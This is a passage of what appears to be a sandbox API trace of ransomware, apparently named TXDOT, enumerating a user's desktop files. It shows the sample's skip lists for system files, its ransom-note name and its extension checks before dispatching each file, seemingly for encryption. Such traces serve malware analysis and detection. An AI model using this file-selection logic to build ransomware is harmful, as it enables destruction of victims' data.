SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.739] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.746] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.746] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" [0073.746] SetEvent (hEvent=0x410) returned 1 [0073.746] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210b79b0, ftCreationTime.dwHighDateTime=0x1d5e3df, ftLastAccessTime.dwLowDateTime=0xcdbaa770, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0xcdbaa770, ftLastWriteTime.dwHighDateTime=0x1d5e9b2, nFileSizeHigh=0x0, nFileSizeLow=0x15227, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="I0Kapz95f.avi", cAlternateFileName="I0KAPZ~1.AVI")) returned 1 [0073.746] StrCmpW (psz1="I0Kapz95f.avi", psz2=".") returned 1 [0073.746] StrCmpW (psz1="I0Kapz95f.avi", psz2="..") returned 1 [0073.746] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.746] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.746] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="I0Kapz95f.avi", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" [0073.746] PathFindExtensionW (pszPath="I0Kapz95f.avi") returned=".avi" [0073.746] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2="bootsect.bak") returned 1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2="iconcache.db") returned -1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2="thumbs.db") returned -1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2=" ransomware ") returned 1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2=" ransom ") returned 1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2="debug.txt") returned 1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2="boot.ini") returned 1 [0073.746] StrCmpIW (psz1="I0Kapz95f.avi", psz2="desktop.ini") returned 1 [0073.747] StrCmpIW (psz1="I0Kapz95f.avi", psz2="autorun.inf") returned 1 [0073.747] StrCmpIW (psz1="I0Kapz95f.avi", psz2="ntuser.dat") returned -1 [0073.747] StrCmpIW (psz1="I0Kapz95f.avi", psz2="ntldr") returned -1 [0073.747] StrCmpIW (psz1="I0Kapz95f.avi", psz2="ntdetect.com") returned -1 [0073.747] StrCmpIW (psz1="I0Kapz95f.avi", psz2="bootfont.bin") returned 1 [0073.747] StrCmpIW (psz1="I0Kapz95f.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.747] PathFindExtensionW (pszPath="I0Kapz95f.avi") returned=".avi" [0073.747] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0073.747] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.747] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.747] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.753] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.753] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" [0073.753] SetEvent (hEvent=0x418) returned 1 [0073.753] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27f63220, ftCreationTime.dwHighDateTime=0x1d5ea5a, ftLastAccessTime.dwLowDateTime=0x961c3bd0, ftLastAccessTime.dwHighDateTime=0x1d5edf9, ftLastWriteTime.dwLowDateTime=0x961c3bd0, ftLastWriteTime.dwHighDateTime=0x1d5edf9, nFileSizeHigh=0x0, nFileSizeLow=0x8f58, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OCsemDUOtc.swf", cAlternateFileName="OCSEMD~1.SWF")) returned 1 [0073.753] StrCmpW (psz1="OCsemDUOtc.swf", psz2=".") returned 1 [0073.753] StrCmpW (psz1="OCsemDUOtc.swf", psz2="..") returned 1 [0073.753] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.753] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.753] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="OCsemDUOtc.swf", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" [0073.753] PathFindExtensionW (pszPath="OCsemDUOtc.swf") returned=".swf" [0073.753] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0073.753] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="bootsect.bak") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="iconcache.db") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="thumbs.db") returned -1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2=" ransomware ") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2=" ransom ") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="debug.txt") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="boot.ini") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="desktop.ini") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="autorun.inf") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="ntuser.dat") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="ntldr") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="ntdetect.com") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="bootfont.bin") returned 1 [0073.754] StrCmpIW (psz1="OCsemDUOtc.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.754] PathFindExtensionW (pszPath="OCsemDUOtc.swf") returned=".swf" [0073.754] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0073.754] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.754] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.754] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.763] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.763] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" [0073.763] SetEvent (hEvent=0x410) returned 1 [0073.763] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8344ae60, ftCreationTime.dwHighDateTime=0x1d5e98b, ftLastAccessTime.dwLowDateTime=0x5773cb70, ftLastAccessTime.dwHighDateTime=0x1d5e84d, ftLastWriteTime.dwLowDateTime=0x5773cb70, ftLastWriteTime.dwHighDateTime=0x1d5e84d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8e, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="R1PzCjuzfThXdK9.ppt", cAlternateFileName="R1PZCJ~1.PPT")) returned 1 [0073.763] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt", psz2=".") returned 1 [0073.763] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt", psz2="..") returned 1 [0073.763] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.763] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.763] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="R1PzCjuzfThXdK9.ppt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" [0073.763] PathFindExtensionW (pszPath="R1PzCjuzfThXdK9.ppt") returned=".ppt" [0073.763] StrCmpW (psz1=".ppt", psz2=".txd0t") returned -1 [0073.763] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="bootsect.bak") returned 1 [0073.763] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="iconcache.db") returned 1 [0073.763] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="thumbs.db") returned -1 [0073.763] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2=" ransomware ") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2=" ransom ") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="debug.txt") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="boot.ini") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="desktop.ini") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="autorun.inf") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="ntuser.dat") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="ntldr") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="ntdetect.com") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="bootfont.bin") returned 1 [0073.764] StrCmpIW (psz1="R1PzCjuzfThXdK9.ppt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.764] PathFindExtensionW (pszPath="R1PzCjuzfThXdK9.ppt") returned=".ppt" [0073.764] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ppt") returned 0x0 [0073.764] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.764] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.764] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.775] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.775] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt" [0073.775] SetEvent (hEvent=0x418) returned 1 [0073.775] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dee5590, ftCreationTime.dwHighDateTime=0x1d5ea10, ftLastAccessTime.dwLowDateTime=0x50bf210, ftLastAccessTime.dwHighDateTime=0x1d5e43b, ftLastWriteTime.dwLowDateTime=0x50bf210, ftLastWriteTime.dwHighDateTime=0x1d5e43b, nFileSizeHigh=0x0, nFileSizeLow=0x9b2d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Rud6mibY589Ee3.mkv", cAlternateFileName="RUD6MI~1.MKV")) returned 1 [0073.775] StrCmpW (psz1="Rud6mibY589Ee3.mkv", psz2=".") returned 1 [0073.775] StrCmpW (psz1="Rud6mibY589Ee3.mkv", psz2="..") returned 1 [0073.775] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.775] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.775] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Rud6mibY589Ee3.mkv", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" [0073.775] PathFindExtensionW (pszPath="Rud6mibY589Ee3.mkv") returned=".mkv" [0073.775] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0073.775] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="bootsect.bak") returned 1 [0073.775] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="iconcache.db") returned 1 [0073.775] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="thumbs.db") returned -1 [0073.775] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2=" ransomware ") returned 1 [0073.775] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2=" ransom ") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="debug.txt") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="boot.ini") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="desktop.ini") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="autorun.inf") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="ntuser.dat") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="ntldr") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="ntdetect.com") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="bootfont.bin") returned 1 [0073.776] StrCmpIW (psz1="Rud6mibY589Ee3.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.776] PathFindExtensionW (pszPath="Rud6mibY589Ee3.mkv") returned=".mkv" [0073.776] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0073.776] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.776] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.776] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.782] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.782] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" [0073.782] SetEvent (hEvent=0x410) returned 1 [0073.782] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc974c90, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xf811d50, ftLastAccessTime.dwHighDateTime=0x1d5ea54, ftLastWriteTime.dwLowDateTime=0xf811d50, ftLastWriteTime.dwHighDateTime=0x1d5ea54, nFileSizeHigh=0x0, nFileSizeLow=0x9145, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="X24_B.gif", cAlternateFileName="")) returned 1 [0073.782] StrCmpW (psz1="X24_B.gif", psz2=".") returned 1 [0073.782] StrCmpW (psz1="X24_B.gif", psz2="..") returned 1 [0073.782] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.782] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.782] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="X24_B.gif", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" [0073.782] PathFindExtensionW (pszPath="X24_B.gif") returned=".gif" [0073.782] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="bootsect.bak") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="iconcache.db") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="thumbs.db") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2=" ransomware ") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2=" ransom ") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="debug.txt") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="boot.ini") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="desktop.ini") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="autorun.inf") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="ntuser.dat") returned 1 [0073.782] StrCmpIW (psz1="X24_B.gif", psz2="ntldr") returned 1 [0073.783] StrCmpIW (psz1="X24_B.gif", psz2="ntdetect.com") returned 1 [0073.783] StrCmpIW (psz1="X24_B.gif", psz2="bootfont.bin") returned 1 [0073.783] StrCmpIW (psz1="X24_B.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.783] PathFindExtensionW (pszPath="X24_B.gif") returned=".gif" [0073.783] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0073.783] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.783] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.783] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.790] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.790] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif" [0073.790] SetEvent (hEvent=0x418) returned 1 [0073.790] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7352e6f0, ftCreationTime.dwHighDateTime=0x1d5e4c9, ftLastAccessTime.dwLowDateTime=0x81b04700, ftLastAccessTime.dwHighDateTime=0x1d5e48e, ftLastWriteTime.dwLowDateTime=0x81b04700, ftLastWriteTime.dwHighDateTime=0x1d5e48e, nFileSizeHigh=0x0, nFileSizeLow=0xa8f1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="xs8aVnsK9NnWwoql.png", cAlternateFileName="XS8AVN~1.PNG")) returned 1 [0073.790] StrCmpW (psz1="xs8aVnsK9NnWwoql.png", psz2=".") returned 1 [0073.790] StrCmpW (psz1="xs8aVnsK9NnWwoql.png", psz2="..") returned 1 [0073.790] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.790] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.790] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="xs8aVnsK9NnWwoql.png", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" [0073.790] PathFindExtensionW (pszPath="xs8aVnsK9NnWwoql.png") returned=".png" [0073.790] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0073.790] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="bootsect.bak") returned 1 [0073.790] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="iconcache.db") returned 1 [0073.790] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="thumbs.db") returned 1 [0073.790] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2=" ransomware ") returned 1 [0073.790] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2=" ransom ") returned 1 [0073.790] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="debug.txt") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="boot.ini") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="desktop.ini") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="autorun.inf") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="ntuser.dat") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="ntldr") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="ntdetect.com") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="bootfont.bin") returned 1 [0073.791] StrCmpIW (psz1="xs8aVnsK9NnWwoql.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.791] PathFindExtensionW (pszPath="xs8aVnsK9NnWwoql.png") returned=".png" [0073.791] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0073.792] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.792] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.792] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.799] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.799] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" [0073.799] SetEvent (hEvent=0x410) returned 1 [0073.799] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcbf2e40, ftCreationTime.dwHighDateTime=0x1d5e4e8, ftLastAccessTime.dwLowDateTime=0x7729f3c0, ftLastAccessTime.dwHighDateTime=0x1d5e1a1, 